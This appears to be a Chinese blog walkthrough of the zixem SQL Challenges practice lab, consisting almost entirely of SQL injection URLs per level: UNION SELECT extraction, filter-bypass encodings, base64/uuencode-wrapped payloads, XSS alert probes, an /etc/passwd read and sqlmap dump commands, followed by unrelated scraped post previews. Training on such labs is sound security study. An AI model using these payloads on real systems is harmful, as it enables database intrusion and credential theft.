http://www.zixem.altervista.org/SQLi/

第一关

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+

sqlmap -u "注入点" --dbs

sqlmap -u "注入点" -D xx --tables

sqlmap -u "注入点" -D XX -T XX --columns

sqlmap -u "注入点" -D XX -T XX -C XX --dump

sqlmap -u "注入点" --users

sqlmap -u "注入点" --passwords

xss

http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E

第二关

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+

第三关

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+

第四关

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+

m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+

第五关

http://www.zixem.altervista.org/SQLi/login_lvl5.php

http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c

第六关

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+

xss
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E

sqlmap 跑盲注

第七关

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+

http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+

无回显

http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+

第八关

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+

特殊字符绕过

A plus sign (+)

A simple URL encoded space (%20)

A null byte (%00)

A newline (%0a)

A tab (%09)

A carriage return (%0d)

构造poc

空格%20

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

空字节%00

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+

换行\n %0a

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+

回车%0d

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+

Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

Tab %09

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--

大小写

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--

url加密

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20

使用特殊字符   *

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--

关键词替换

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--

第九关

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+

第十关

http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=

构造编码

1 AND 1=2 UNION SELECT 1,2--

使用Uuencode decoder 进行解码

<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```

base64加密

PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

构造注入语句

1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--

结果

M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```

64编码

TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg


参考文档 https://www.cnblogs.com/hack404/p/10387894.html

SQL Challenges靶机的更多相关文章

  1. SQL Challenges

    平台: http://www.zixem.altervista.org/SQLi/ Level 1 (Super Easy) http://www.zixem.altervista.org/SQLi/ ...

  2. XSS challenges靶机

    第一关 <script>alert(123)</script> "><svg onload=alert(123)> 第二关 <script&g ...

  3. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  4. 【新手篇】搭建DCN漏洞靶机及简单的SQL手工注入

    很多新手小白入门后发现想要学好“网安”技术,除了掌握基础理论知识,更需要经常模拟不同的漏洞环境,但是如果使用外网服务器练习,会存在一定风险,因此能够搭建一个本地的模拟环境去测试漏洞将是一个不错的方案. ...

  5. DVWA靶机-sql自动注入

    1. 使用dvwa靶机进行sql注入实战(注:当前靶机安全级别为low) 打开sql漏洞,发现输入不同的数字会返回不同的信息, 先尝试手工判断是否存在sql注入 一般sql注入语句像这样,我们构造的是 ...

  6. SQL注入测试平台 SQLol -6.CHALLENGES挑战

    SQLol上面的挑战共有14关,接下来我们一关一关来突破. Challenge 0 目的是让查询返回所有的用户名,而不是只有一个. SELECT username FROM users WHERE u ...

  7. DC靶机1-9合集

    DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...

  8. DC-1 靶机渗透

    DC-1 靶机渗透 *概况*: 下载地址 https://www.vulnhub.com/entry/dc-1,292/ *官方描述:* DC-1 is a purposely built vulne ...

  9. sql注入学习小结

    /* 转载请注明出处,By:珍惜少年时 小知识,只是放在博客吃饭时无聊看看,大牛勿喷. */ 珍惜少年时博客,专注网络安全 web渗透测试 00x1爆所有库: mysql> select sch ...

随机推荐

  1. 【Python报错】ValueError: If using all scalar values, you must pass an index

    问题: 1.ValueError: If using all scalar values, you must pass an index.意思是:如果使用所有标量值,则必须传递索引 2.再看错误发生代 ...

  2. VBS脚本编程(4)——流程控制语句

    分支结构--If .. Then .. Else .. 根据表达式的值有条件地执行一组语句. If condition Then statements [Else elsestatements ] 或 ...

  3. 【进阶之路】深入理解Java虚拟机的类加载机制(长文)

    我们在参加面试的时候,经常被问到一些关于类加载机制的问题,也都会在面试之前准备的时候背好答案,但是我们是否有去深入了解什么是类加载机制呢?这段时间因为一些事情在家看了些书,这次就和大家分享一些关于Ja ...

  4. 『无为则无心』Python基础 — 14、Python流程控制语句(while循环语句)

    目录 1.什么是循环结构 2.while循环 (1)while循环的语法 (2)while循环的应用 3.while语句的死循环 4.break和continue 5.while循环嵌套 (1)应用场 ...

  5. js笔记5

    1.逻辑运算 ||  &&  ! ||:遇到第一个为true的值就中止并返回 &&:遇到第一个为false的值就中止并返回,如果没有false值,就返回最后一个不是fa ...

  6. 41、mysql数据库(存储过程)

    0.创建表: (1)建表: CREATE TABLE blog ( id INT PRIMARY KEY auto_increment, name CHAR(64), sub_time datetim ...

  7. Place the Robots 需要较强的建图能力

    Place the Robots 思路:在任意一个点格子放机器人,那么它所在的行和列被控制了.我们对每一行或每一列连续的空地(草地忽视)称之为块,给每一行和每一列的块标号, 每一行的快与每一列的快相交 ...

  8. 使用RSA和DES保护的Socket通信

    基本要求:将DES加密算法应用于网络通信,使用RSA算法自动分配密钥,设计好界面,可验证自动生成的密钥和加解密正确的结果. 具体实现要求:客户端和服务器建立连接后,客户端生成一个随机DES密钥;服务器 ...

  9. HTTP:Java实现HTTP请求的三种方式

    目前JAVA实现HTTP请求的方法用的最多的有两种: 一种是通过HTTPClient这种第三方的开源框架去实现.HTTPClient对HTTP的封装性比较不错,通过它基本上能够满足我们大部分的需求,H ...

  10. yoyogo v1.7.5 发布, 独立依赖注入DI

    YoyoGo v1.7.5 YoyoGo (Go语言框架) 一个简单.轻量.快速.基于依赖注入的微服务框架( web .grpc ),支持Nacos/Consoul/Etcd/Eureka/k8s / ...